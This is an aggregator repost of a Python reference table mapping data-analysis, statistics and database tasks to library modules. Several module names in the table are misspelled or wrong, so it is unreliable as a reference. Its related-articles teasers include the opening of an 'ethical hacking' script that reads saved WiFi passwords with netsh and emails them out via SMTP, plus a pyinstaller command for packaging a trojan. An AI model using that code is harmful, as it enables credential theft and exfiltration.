首页 / PYTHON / Python Reference in Data Analysis / Mining Tools

Python Reference in Data Analysis / Mining Tools

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了Python Reference in Data Analysis / Mining Tools，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含3956字，纯文字阅读大概需要6分钟。

内容图文

Python Reference in Data Analysis / Mining Tools

If you are already familiar with the module/package loading methods of Python, the following table is relatively easy to find.

Python is referenced in the following table as a module. Some modules are not native modules. Please use pip install * to install;

Mechine Learning

Category	Subcategory	Python
LDA		sklearn.discriminant_analysis.LinearDiscriminantAnalysis
QDA		sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis
SVM (Support Vector Machine)	Support Vector Classifier (SVC)	sklearn.svm.SVC
	Non-support vector classifier (nonSVC)	sklearn.svm.NuSVC
	Linear Support Vector Classifier (Lenear SVC)	sklearn.svm.LinearSVC
Based on proximity	K-proximity classifier	sklearn.neighbors.KNeighborsClassifier
	Radius proximity classifier	sklearn.neighbors.RadiusNeighborsClassifier
	Nearest Centroid Classifier	sklearn.neighbors.NearestCentroid
Bayes	Naive Bayes	sklearn.naive_bayes.GaussianNB
	Multinomial Naive Bayes	sklearn.naive_bayes.MultinomialNB
	Bernoulli Naive Bayes	sklearn.naive_bayes.BernoulliNB
DecisionTree	DecisionTree Classifier	sklearn.tree.DecisionTreeClassifier
DecisionTree	DecisionTree Regressor	sklearn.tree.DecisionTreeRegressor
Assemble Method	Bagging Random Forest Classifier	sklearn.ensemble.RandomForestClassifier
	Bagging Random Forest Regressor	sklearn.ensemble.RandomForestRegressor
	Boosting Gradient Boosting	xgboost Module
	Boosting AdaBoost	sklearn.ensemble.AdaBoostClassifier
Cluster	kmeans	scipy.cluster.kmeans.kmeans
	Hierarchical Cluster	scipy.cluster.hierarchy.fcluster
	DBSCAN	sklearn.cluster.DBSCAN
	Birch	sklearn.cluster.Birch
	K-Medoids Cluster	pyclust.KMedoids(Unknown reliability)
Association Rule	Apriori Algorithm	apriori(Unknown reliability, not support py3), PyFIM(Unknown reliability, unable to install with pip)
Association Rule	FP-Growth Algorithm	fp-growth(Unknown reliability, not support py3), PyFIM(Unknown reliability, unable to install with pip)
Neural Network	Neural Network	neurolab.net, keras.*
Neural Network	Deep Learning	keras.*

Connector & IO

Database

Category	Python
MySQL	mysql-connector-python(Official)
Oracle	cx_Oracle
Redis	redis
MongoDB	pymongo
neo4j	py2neo
Cassandra	cassandra-driver
ODBC	pyodbc
JDBC	Unknown[Jython Only]

Category	Python
excel	xlsxWriter, pandas.(from/to)_excel, openpyxl
csv	csv.writer
json	json
picture	PIL

Statistics

Category	Python
描述性统计汇总	scipy.stats.descirbe
均值	scipy.stats.gmean(几何平均数), scipy.stats.hmean(调和平均数), numpy.mean, numpy.nanmean, pandas.Series.mean
中位数	numpy.median, numpy.nanmediam, pandas.Series.median
众数	scipy.stats.mode, pandas.Series.mode
分位数	numpy.percentile, numpy.nanpercentile, pandas.Series.quantile
经验累积函数(ECDF)	statsmodels.tools.ECDF
标准差	scipy.stats.std, scipy.stats.nanstd, numpy.std, pandas.Series.std
方差	numpy.var, pandas.Series.var
变异系数	scipy.stats.variation
协方差	numpy.cov, pandas.Series.cov
(Pearson)相关系数	scipy.stats.pearsonr, numpy.corrcoef, pandas.Series.corr
峰度	scipy.stats.kurtosis, pandas.Series.kurt
偏度	scipy.stats.skew, pandas.Series.skew
直方图	numpy.histogram, numpy.histogram2d, numpy.histogramdd

Regression (including statistics and machine learning)

类别	Python
普通最小二乘法回归(ols)	statsmodels.ols, sklearn.linear_model.LinearRegression
广义线性回归(gls)	statsmodels.gls
分位数回归(Quantile Regress)	statsmodels.QuantReg
岭回归	sklearn.linear_model.Ridge
LASSO	sklearn.linear_model.Lasso
最小角回归	sklearn.linear_modle.LassoLars
稳健回归	statsmodels.RLM

Hypothetical Test

类别	Python
t检验	statsmodels.stats.ttest_ind, statsmodels.stats.ttost_ind, statsmodels.stats.ttost.paired; scipy.stats.ttest_1samp, scipy.stats.ttest_ind, scipy.stats.ttest_ind_from_stats, scipy.stats.ttest_rel
ks检验(检验分布)	scipy.stats.kstest, scipy.stats.kstest_2samp
wilcoxon(非参检验，差异检验)	scipy.stats.wilcoxon, scipy.stats.mannwhitneyu
Shapiro-Wilk正态性检验	scipy.stats.shapiro
Pearson相关系数检验	scipy.stats.pearsonr

Time series

Category	Python
AR	statsmodels.ar_model.AR
ARIMA	statsmodels.arima_model.arima
VAR	statsmodels.var_model.var

原文：https://www.cnblogs.com/aiden-liu/p/10773803.html

内容总结

以上是互联网集市为您收集整理的Python Reference in Data Analysis / Mining Tools全部内容，希望文章能够帮你解决Python Reference in Data Analysis / Mining Tools所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/1291609.html

来源：【匿名】

【上一篇】Python 中的几种矩阵乘法 np.dot, np.multiply, *【转】【下一篇】浅谈PHP运行Python脚本的方法

更多 ►

【Python Reference in Data Analysis / Mining Tools】教程文章相关的互联网学习教程文章

Python Reference in Data Analysis / Mining Tools

If you are already familiar with the module/package loading methods of Python, the following table is relatively easy to find.Python is referenced in the following table as a module. Some modules are not native modules. Please use pip install * to install;Mechine LearningCategorySubcategoryPythonLDA sklearn.discriminant_analysis.LinearDiscriminantAnalysisQDA sklearn.discriminant_analysis.Quadratic...

Python For Data Analysis -- NumPy【图】

NumPy作为python科学计算的基础，为何python适合进行数学计算，除了简单易懂，容易学习Python可以简单的调用大量的用c和fortran编写的legacy的库 The NumPy ndarray: A Multidimensional Array Objectndarray，可以理解为n维数组，用于抽象矩阵和向量Creating ndarrays最简单的就是，从list初始化，当然还有其他的方式，比如，汇总， Data Types for ndarrays首先对于ndarray只能存放同一类型数据，并且由于封装了c和fortran的库，...

PythonForDataAnalysis学习之路【图】

在引言章节里，介绍了MovieLens 1M数据集的处理示例。书中介绍该数据集来自GroupLens Research（）,该地址会直接跳转到，这里面提供了来自MovieLens网站的各种评估数据集，可以下载相应的压缩包，我们需要的MovieLens 1M数据集也在里面。下载解压后的文件夹如下：这三个dat表都会在示例中用到。我所阅读的《Python For Data Analysis》中文版（PDF）是2014年第一版的，里面所有示例都是基于Python 2.7和pandas 0.8.2所写的，而我安...

如何在短时间内快速入门SocialNetworkAnalysis？【图】

有哪些教材可以推荐？又应该从哪一种分析软件入手？回复内容：首先社会网络分析有两种路线，一种偏文科的，偏社会学，就是讲究在一定量化基础上定性分析，解释一些社会现象，另外一种是偏理科的，往往需要大量数据点，然后从数学上对拓扑结构进行定量分析和判断，或者会利用到网络上的社交网络（Online Social Networks）进行大规模的计算。如果是软件党，一般就是第一种了，把网络扔进软件算算指标什么的。软件推荐Gephi，这个可...

NumpyAPIAnalysis

histogram >>> a = numpy.arange(5)>>> hist, bin_edges = numpy.histogram(a,density=False)>>> hist, bin_edges(array([1, 0, 1, 0, 0, 1, 0, 1, 0, 1], dtype=int64), array([ 0. , 0.4, 0.8, 1.2, 1.6, 2. , 2.4, 2.8, 3.2, 3.6, 4. ])) Analysis:Variable a is [0 1 2 3 4]After call histogram, it will calculate the total count each number in a= [0 1 2 3 4] according to each bins(阈值), for example:bi...

python3.6+torch1.2实现Sentiment Analysis（数据集MR）【代码】【图】

总共是下面几个文件：注意，最后一个是json文件，里面是电影影评数据集MR的划分出来的训练集生成的词典。是个字典文件，也可以自己再弄一个。在训练集上训练了10个epoch，结果大概是上图这个样子 1、创建model_para.py文件，里面是模型的超参数。 import argparseclass Hpara():parser = argparse.ArgumentParser() ############# insert paras #############parser.add_argument('--batch_size',default = 16, type = int)...

Python Ethical Hacking - TROJANS Analysis(4)【代码】【图】

Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable - adding the "--icon" arguments this time.wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-32/Scripts/pyinstaller.exe --add-data "/root/Downloa...

Python Ethical Hacking - Malware Analysis(3)【代码】【图】

Stealing WiFi Password Saved on a Computer#!/usr/bin/env pythonimport smtplib import subprocess import redef send_mail(email, password, message):server = smtplib.SMTP("smtp.gmail.com", 587)server.starttls()server.login(email, password)server.sendmail(email, email, message)server.quit()command = "netsh wlan show profile" networks = subprocess.check_output(command, shell=True) network_names_list = r...

[Python For Data Analysis] Numpy Basics

创建数组 import numpy as np# np.array 将一个iterable object转换为 ndarray data2 = [[2, 3, 4], [5, 6, 7]] arr2 = np.array(data2, dtype = np.float64) #[[2. 3. 4.] # [5. 6. 7.]]arr3 = np.array(data2, dtype = np.int32) #[[2 3 4] # [5 6 7]]# astype 方式将一种数据类型的array转换为另一个类型的array float32_arr = arr2.astype(np.float32)numeric_strings = np.array(['1.23', '-9.6', '43.4'], dtype=np.string_)...

如何使用Python(scikit-learn)计算FactorAnalysis得分？【代码】

我需要进行探索性因子分析,并使用Python计算每个观察的分数,假设只有1个潜在因素.似乎sklearn.decomposition.FactorAnalysis()是要走的路,但遗憾的是documentation和example(遗憾的是我无法找到其他例子)对我来说还不够清楚如何完成工作. 我有以下测试文件,包含29个29变量的观察结果(test.csv)：49.6,34917,24325.4,305,101350,98678,254.8,276.9,47.5,1,3,5.6,3.59,11.9,0,97.5,97.6,8,10,100,0,0,96.93,610.1,100,1718.22,6.7,28...

Applied-Social-Network-Analysis-in-Python 相关笔记4【图】

模型数据越多，Average系数就越小。 perferential attachment model 有比较小的平均路径长度，但有着小的cc。rewire:重新连接如果仅看这个共同的邻居数的话，数量一样的话，评判不出来。

吴裕雄 python 机器学习——线性判断分析LinearDiscriminantAnalysis【代码】【图】

import numpy as np import matplotlib.pyplot as pltfrom matplotlib import cm from mpl_toolkits.mplot3d import Axes3D from sklearn.model_selection import train_test_split from sklearn import datasets, linear_model,discriminant_analysisdef load_data():# 使用 scikit-learn 自带的 iris 数据集iris=datasets.load_iris()X_train=iris.datay_train=iris.targetreturn train_test_split(X_train, y_train,test_size=0...

01Design and Analysis Algorithm Using Python-程振波【代码】【图】

1.(p14)比较两个数的大小a = int(input(num:)) b = int(input(num:)) def getMax(a,b):if a>b :print(The bigger number is a:)else:print(The bigger number is b:) getMax(a,b)Compare 2.

Python and R Reference in Data Analysis / Mining Tools【图】

If you are already familiar with the module/package loading methods of Python and R, the following table is relatively easy to find. Python is referenced in the following table as a module. Some modules are not native modules. Please use pip install * to install; For the same reason, in order to facilitate indexing, R also refers to:: indicates the function and the name of the package where the fu...

Exploratory data analysis and feature extraction with Python【图】

Exploratory data analysis and feature extraction with Python 此图片是学习kaggle中某篇kernel时的思维导图，总结了python进行探索性数据分析和特征提取的基本方法和步骤，有可借鉴内容。暂时无法找到全篇kernel的链接，若重新找到再附上。

PYTHON - 技术教程分类

Python3 教程 Python3 简介 Python3 环境搭建 Python3 基础语法 Python3 基本数据类型 Python3 解释器 Python3 注释 Python3 运算符 Python3 数字(Number) Python3 字符串 Python3 列表 Python3 元组 Python3 字典 Python3 集合 Python3 编程第一步 Python3 条件控制 Python3 循环语句 Python3 迭代器与生成器 Python3 函数 Python3 数据结构 Python3 模块 Python3 输入和输出 Python3 File Python3 OS Python3 错误和异常 Python3 面向对象 Python3 命名空间/作用域 Python3 标准库概览 Python3 实例 Python3 CGI编程 Python3 MySQL(PyMySQL) Python3 网络编程 Python3 SMTP发送邮件 Python3 多线程 Python3 日期和时间 Python3 内置函数 Python3 MongoDB Python3 urllib python 全部

PYTHON - 最热教程

python如何统计字符串中字母个数？使用Python进行微信公众号开发（三）回...Python+PyQT5的子线程更新UI界面的实例 python时间戳怎么获得？如何获得当前时...vscode调试python时提示无法将“conda”...python接口自动化全局变量access_token...python收取邮件(腾讯企业邮箱)python如何绘制降水图详解python并发获取snmp信息及性能测试...怎么卸载Python3.6？

首页 / PYTHON / Python Reference in Data Analysis / Mining Tools

Python Reference in Data Analysis / Mining Tools

内容导读

内容图文

内容总结

内容备注

内容手机端

【Python Reference in Data Analysis / Mining Tools】教程文章相关的互联网学习教程文章

PYTHON - 技术教程分类

PYTHON - 最新教程

PYTHON - 最热教程